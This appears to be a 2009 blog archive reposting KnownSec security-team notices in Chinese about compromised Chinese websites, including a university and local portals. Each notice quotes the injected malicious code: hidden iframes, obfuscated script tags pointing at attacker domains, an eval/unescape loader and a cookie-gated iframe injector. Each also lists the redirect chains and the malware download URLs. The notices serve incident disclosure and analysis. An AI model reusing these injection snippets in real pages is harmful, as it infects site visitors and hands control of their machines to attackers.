This theme is downloaded from wordpress themes website.

Archive for April, 2009

青岛搜狐网被植入恶意代码

发布时间:Thu Apr 30 2009 17:33:01 UTC+0800
最后更新时间:Thu Apr 30 2009 17:33:01 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 青岛搜狐网(http://www.qdsohu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://m.qdsohu.cn/qingdaocaijing.files/index.htm

网页被嵌入恶意链接代码:

090430snap8.jpg

<iframe src=http://bfemf.cn/b8/index.htm width=100 height=0></iframe><iframe src=http://ohahap.cn/360/a02.htm width=10 height=0></iframe><iframe src=http://nhahao.cn/360/a02.htm width=10 height=0></iframe><iframe src=http://nhahao.cn/360/a02.htm width=10 height=0></iframe><script language=javascript src=http://%77%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
挂马分析:
[wide]http://m.qdsohu.cn/qingdaocaijing.files/index.htm
 [frame]http://bfemf.cn/b8/index.htm
 [frame]http://ohahap.cn/360/a02.htm
 [frame]http://nhahao.cn/360/a02.htm
 [frame]http://nhahao.cn/360/a02.htm
 [script]http://%77%2e%39%34%73%61%6f%6d%6d%2e%63%6f%6d/js.js
  [frame]http://www.wuhemd.cn/a/rs.htm
   [frame]http://www.wuhemd.cn/a/x.htm
    [script]http://www.wuhemd.cn/a/all.css
     [frame]http://www.wuhemd.cn/a/3.htm
     [frame]http://www.wuhemd.cn/a/4.htm
    [frame]http://www.wuhemd.cn/a/1.htm
    [frame]http://www.wuhemd.cn/a/newlz.htm
    [frame]http://www.wuhemd.cn/a/s.htm
    [frame]http://www.wuhemd.cn/a/office.htm
    [frame]http://www.wuhemd.cn/a/bf.htm
    [frame]http://www.wuhemd.cn/a/cx.htm
    [frame]http://www.wuhemd.cn/a/uuss.htm
    [frame]http://www.wuhemd.cn/a/2.htm
    [frame]http://www.wuhemd.cn/a/7.htm
   [script]http://js.tongji.cn.yahoo.com/806392/ystat.js
最终下载病毒文件:
http://www.wuhemd.cn/a/a.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

网站挂马记录 lk 30 Apr 2009 No Comments

中国大学生门户网被植入恶意代码

发布时间:Thu Apr 30 2009 17:19:11 UTC+0800
最后更新时间:Thu Apr 30 2009 17:19:11 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国大学生门户网(http://www.51cndxs.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.51cndxs.com/

网页被嵌入恶意链接代码:

090430snap7.jpg

<script src=http://3b3.org/c.js></script>
挂马分析:
[wide]http://www.51cndxs.com/
 [script]http://3b3.org/c.js
  [frame]http://4f345g.2288.org/a/a100.htm
   [frame]http://4f345g.2288.org/a/cnzz.htm
    [frame]http://4f345g.2288.org/a/yy.htm
    [frame]http://4f345g.2288.org/a/flash.htm
    [frame]http://4f345g.2288.org/a/qb.htm
    [frame]http://4f345g.2288.org/a/ippp.htm
    [frame]http://4f345g.2288.org/a/ip.htm
    [frame]http://4f345g.2288.org/a/02.htm
    [frame]http://4f345g.2288.org/a/lz.htm
    [frame]http://4f345g.2288.org/a/office.htm
   [script]http://w.cnzz.com/c.php?id=30014955&l=1
   [script]http://count7.51much.com/cnt.php?uid=ua-1-12981&style=text&text=网站统计
  [frame]http://4f345g.2288.org/a/a100.htm
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js
最终下载病毒文件:
http://xinfa8.com/xia/f1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

网站挂马记录 lk 30 Apr 2009 No Comments

不可输-读书信息网被植入恶意代码

发布时间:Thu Apr 30 2009 17:15:16 UTC+0800
最后更新时间:Thu Apr 30 2009 17:15:16 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 不可输-读书信息网(http://www.bookshu.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.bookshu.com/

网页被嵌入恶意链接代码:

090430snap6.jpg

<script src=http://%6D%62%72%32%2E%63%6E></script>
<script src=http://%6D%62%72%38%2E%63%6E></script>
<script src=http://%33%38%7A%75%2E%63%6E></script>
挂马分析:
[wide]http://www.bookshu.com/
 [script]http://%6d%62%72%32%2e%63%6e
  [frame]http://37988.com.cn/a10/a10.htm
   [frame]http://37988.com.cn/a10/new.html
    [script]http://37988.com.cn/a10/../zhin.js
    [frame]http://37988.com.cn/a10/../14.htm
    [frame]http://37988.com.cn/a10/fx.htm
    [frame]http://37988.com.cn/a10/../cx.htm
    [frame]http://37988.com.cn/a10/../real10.htm
    [frame]http://37988.com.cn/a10/../real11.htm
    [script]http://37988.com.cn/a10/../wewew.js
   [script]http://s33.cnzz.com/stat.php?1d=1382384&web_id=1382384ishow=pic
   [script]http://s33.cnzz.com/stat.php?id=1382384&web_id=1382384&show=pic
 [script]http://%6d%62%72%38%2e%63%6e
 [script]http://%33%38%7a%75%2e%63%6e
最终下载病毒文件:
http://37988.com.cn/as.css
http://www.19399.com.cn/bf.css
http://37988.com.cn/ms.css
http://www.19399.com.cn/mm.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

网站挂马记录 lk 30 Apr 2009 No Comments

中国菜鸟学习基地被植入恶意代码

发布时间:Thu Apr 30 2009 17:10:55 UTC+0800
最后更新时间:Thu Apr 30 2009 17:10:55 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 中国菜鸟学习基地(http://www.cainwo.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.cainwo.cn/images/default/swfobject.js

网页被嵌入恶意链接代码:

090430snap5.jpg

document.write(eval(unescape(”%27%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%61%69%6c%27%2b%27%69%6c%61%2e%63%6e%2f%63%6c%69%63%6b%2e%70%68%70%3e%3c%2f%73%63%72%27%2b%27%69%70%74%3e%27″)));
挂马分析:
[wide]http://www.cainwo.cn/
 [script]http://www.cainwo.cn/images/default/swfobject.js
  [script]http://ailila.cn/click.php
   [frame]http://ainikv.cn/07/07.htm
    [frame]http://ainikv.cn/07/ytqm.htm
    [script]http://ainikv.cn/07/js.js
     [frame]http://ainikv.cn/07/yt14.htm
     [frame]http://ainikv.cn/07/ytfl.htm
     [frame]http://ainikv.cn/07/ytff.htm
     [frame]http://ainikv.cn/07/ytvod.htm
     [frame]http://ainikv.cn/07/ytxxz.htm
     [frame]http://ainikv.cn/07/ytbf.htm
     [frame]http://ainikv.cn/07/yt122121.htm
    [script]http://js.tongji.cn.yahoo.com/963243/ystat.js
    [script]http://js.tongji.cn.yahoo.com/902019/ystat.js
   [script]http://js.tongji.cn.yahoo.com/865359/ystat.js
最终下载病毒文件:
http://ainikv.cn/07/07.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

网站挂马记录 lk 30 Apr 2009 No Comments

南充市长热线网被植入恶意代码

发布时间:Thu Apr 30 2009 17:04:41 UTC+0800
最后更新时间:Thu Apr 30 2009 17:04:41 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 南充市长热线网(http://www.081712345.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.081712345.com/

网页被嵌入恶意链接代码:

090430snap4.jpg

<script src=’http://s51.cnzz-c.cn/stat.js?id=872651&web_id=872651′ language=’JavaScript’ type=’text/JavaScript’ charset=’gb2312′></script>
挂马分析:
[wide]http://www.081712345.com/
 [script]http://s51.cnzz-c.cn/stat.js?id=872651&web_id=872651
  [frame]http://27588.com.cn/a16/a16.htm
   [frame]http://27588.com.cn/a16/new.html
    [script]http://27588.com.cn/a16/../zhin.js
    [frame]http://27588.com.cn/a16/../14.htm
    [frame]http://27588.com.cn/a16/fx.htm
    [frame]http://27588.com.cn/a16/../cx.htm
    [frame]http://27588.com.cn/a16/../real10.htm
    [frame]http://27588.com.cn/a16/../real11.htm
    [script]http://27588.com.cn/a16/../wewew.js
   [script]http://s54.cnzz.com/stat.php?1d=1384534&web_id=1384534&show=pic2
   [script]http://s54.cnzz.com/stat.php?id=1384534&web_id=1384534&show=pic2
  [frame]http://pkpk.net.cn/tj.htm
 [script]http://s51.cnzz-c.cn/stat.js?id=872651&web_id=872651
最终下载病毒文件:
http://37988.com.cn/as.css
http://www.19399.com.cn/bf.css
http://37988.com.cn/ms.css
http://www.19399.com.cn/mm.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

网站挂马记录 lk 30 Apr 2009 No Comments

地理标志网被植入恶意代码

发布时间:Thu Apr 30 2009 16:55:44 UTC+0800
最后更新时间:Thu Apr 30 2009 16:55:44 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 地理标志网(http://www.cndlbz.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.cndlbz.com/

网页被嵌入恶意链接代码:

090430snap3.jpg

<script language=’javascript’ type=’text/javascript’ src=’http://w3og.cn/org/’></script>
挂马分析:
[wide]http://www.cndlbz.com/
 [script]http://w3og.cn/org/
  [frame]http://27588.com.cn/a16/a16.htm
   [frame]http://27588.com.cn/a16/new.html
    [script]http://27588.com.cn/a16/../zhin.js
    [frame]http://27588.com.cn/a16/../14.htm
    [frame]http://27588.com.cn/a16/fx.htm
    [frame]http://27588.com.cn/a16/../cx.htm
    [frame]http://27588.com.cn/a16/../real10.htm
    [frame]http://27588.com.cn/a16/../real11.htm
    [script]http://27588.com.cn/a16/../wewew.js
   [script]http://s54.cnzz.com/stat.php?1d=1384534&web_id=1384534&show=pic2
   [script]http://s54.cnzz.com/stat.php?id=1384534&web_id=1384534&show=pic2
最终下载病毒文件:
http://37988.com.cn/as.css
http://www.19399.com.cn/bf.css
http://37988.com.cn/ms.css
http://www.19399.com.cn/mm.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 30 Apr 2009 No Comments

吃饭网被植入恶意代码

发布时间:Thu Apr 30 2009 16:52:17 UTC+0800
最后更新时间:Thu Apr 30 2009 16:52:17 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 吃饭网(http://www.chifan.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.chifan.cn/

网页被嵌入恶意链接代码:

090430snap2.jpg

<script language=’JavaScript’ type=’text/JavaScript’ src=’http://%77%33%6F%67%2E%63%6E/%73%2E%6A%73′></script>
挂马分析:
[wide]http://www.chifan.cn/
 [script]http://%77%33%6f%67%2e%63%6e/%73%2e%6a%73
  [frame]http://27588.com.cn/a16/a16.htm
   [frame]http://27588.com.cn/a16/new.html
    [script]http://27588.com.cn/a16/../zhin.js
    [frame]http://27588.com.cn/a16/../14.htm
    [frame]http://27588.com.cn/a16/fx.htm
    [frame]http://27588.com.cn/a16/../cx.htm
    [frame]http://27588.com.cn/a16/../real10.htm
    [frame]http://27588.com.cn/a16/../real11.htm
    [script]http://27588.com.cn/a16/../wewew.js
   [script]http://s54.cnzz.com/stat.php?1d=1384534&web_id=1384534&show=pic2
   [script]http://s54.cnzz.com/stat.php?id=1384534&web_id=1384534&show=pic2
  [frame]http://pkpk.net.cn/tj.htm
最终下载病毒文件:
http://37988.com.cn/as.css
http://www.19399.com.cn/bf.css
http://37988.com.cn/ms.css
http://www.19399.com.cn/mm.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 30 Apr 2009 No Comments

好方便健康医学网被植入恶意代码

发布时间:Thu Apr 30 2009 16:46:22 UTC+0800
最后更新时间:Thu Apr 30 2009 16:46:22 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 好方便健康医学网(http://www.haofangbian.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.haofangbian.com/count/counterlink.asp?style=none

网页被嵌入恶意链接代码:

090430snap1.jpg

var cookA = new String(document.cookie);
var Then = new Date();
var cookName = ‘9C4A4C5EF042D02′ ;
Then.setTime(Then.getTime() + 12*60*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
   {
document.write(’<iframe src=http://damx.net.cn/29.htm width=50 height=0></iframe>’);
document.cookie = “A1=”+ cookName +”;expires=”+ Then.toGMTString() +”;path=/”;
   }

挂马分析:
[wide]http://www.haofangbian.com/
 [script]http://www.haofangbian.com/count/counterlink.asp?style=none
  [script]http://www.haofangbian.com//count/+url+
  [frame]http://damx.net.cn/29.htm
   [script]http://count48.51yes.com/click.aspx?id=485576456&logo=1
   [frame]http://www.hao-game.com
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://%77%33%6f%67%2e%63%6e/%73%2e%6as
     [frame]http://27588.com.cn/a16/a16.htm
      [frame]http://27588.com.cn/a16/new.html
       [script]http://27588.com.cn/a16/../zhin.js
       [frame]http://27588.com.cn/a16/../14.htm
       [frame]http://27588.com.cn/a16/fx.htm
       [frame]http://27588.com.cn/a16/../cx.htm
       [frame]http://27588.com.cn/a16/../real10.htm
       [frame]http://27588.com.cn/a16/../real11.htm
       [script]http://27588.com.cn/a16/../wewew.js
      [script]http://s54.cnzz.com/stat.php?1d=1384534&web_id=1384534&show=pic2
      [script]http://s54.cnzz.com/stat.php?id=1384534&web_id=1384534&show=pic2
     [frame]http://pkpk.net.cn/tj.htm
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
    [script]http://www.hao-game.com/js/tongji.js
最终下载病毒文件:
http://37988.com.cn/as.css
http://www.19399.com.cn/bf.css
http://37988.com.cn/ms.css
http://www.19399.com.cn/mm.css
http://www.19399.com.cn/re.css
http://www.19399.com.cn/real.css
http://www.19399.com.cn/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 4% [?]

网站挂马记录 lk 30 Apr 2009 No Comments

就业维权网被植入恶意代码

发布时间:Wed Apr 29 2009 18:41:33 UTC+0800
最后更新时间:Wed Apr 29 2009 18:41:33 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 就业维权网(http://www.526job.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.526job.com/

网页被嵌入恶意链接代码:

090429snap11.jpg

<script src=http://3b3.org/c.js></script>
挂马分析:
[wide]http://www.526job.com/
 [script]http://3b3.org/c.js
  [frame]http://23fffb.3322.org/a/a100.htm
   [frame]http://23fffb.3322.org/a/cnzz.htm
    [frame]http://23fffb.3322.org/a/yy.htm
    [frame]http://23fffb.3322.org/a/flash.htm
    [frame]http://23fffb.3322.org/a/qb.htm
    [frame]http://23fffb.3322.org/a/ippp.htm
    [frame]http://23fffb.3322.org/a/ip.htm
    [frame]http://23fffb.3322.org/a/02.htm
    [frame]http://23fffb.3322.org/a/lz.htm
    [frame]http://23fffb.3322.org/a/office.htm
   [script]http://w.cnzz.com/c.php?id=30014955&l=1
   [script]http://count7.51much.com/cnt.php?uid=ua-1-12981&style=text&text=网站统计
  [frame]http://23fffb.3322.org/a/a100.htm
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js
最终下载病毒文件:
http://xinfa8.com/xia/f1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 29 Apr 2009 No Comments

南京师范大学被植入恶意代码

发布时间:Wed Apr 29 2009 18:34:22 UTC+0800
最后更新时间:Wed Apr 29 2009 18:34:22 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 南京师范大学(http://www.njnu.edu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://bkzs.njnu.edu.cn/1.js

网页被嵌入恶意链接代码:

090429snap10.jpg

document.write(”<iframe src=http://qaak47.cn:6868/a0076159/a07.htm width=0 height=0></iframe>”)
挂马分析:
[wide]http://bkzs.njnu.edu.cn/1.js
 [frame]http://qaak47.cn:6868/a0076159/a07.htm
  [frame]http://qaak47.cn:6868/a0076159/new.html
   [script]http://qaak47.cn:6868/a0076159/../xnnn.js
   [script]http://qaak47.cn:6868/a0076159/../zhin.js
   [frame]http://qaak47.cn:6868/a0076159/../14.htm
   [frame]http://qaak47.cn:6868/a0076159/fx.htm
   [frame]http://qaak47.cn:6868/a0076159/../active.htm
   [frame]http://qaak47.cn:6868/a0076159/../cx.htm
   [frame]http://qaak47.cn:6868/a0076159/../real10.htm
   [frame]http://qaak47.cn:6868/a0076159/../real11.htm
   [script]http://qaak47.cn:6868/a0076159/../wewew.js
  [script]http://count1.51much.com/cnt.php?uid=ua-1-13197&style=text&text=网站统计
  [script]http://count1.51much.com/cnt.php?uid=ua-1-13141&style=text&text=网站统计
  [script]http://s75.cnzz.com/stat.php?id=1138949&web_id=1138949
最终下载病毒文件:
http://o-ap.cn:1111/neww/lzz.css
http://o-ap.cn:1111/neww/as.css
http://o-ap.cn:1111/neww/bf.css
http://o-ap.cn:1111/neww/ms.css
http://o-ap.cn:1111/neww/adr.css
http://o-ap.cn:1111/neww/re.css
http://o-ap.cn:1111/neww/real11.css
http://o-ap.cn:1111/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 29 Apr 2009 No Comments

Next Page »

Recommended: Buy movies online.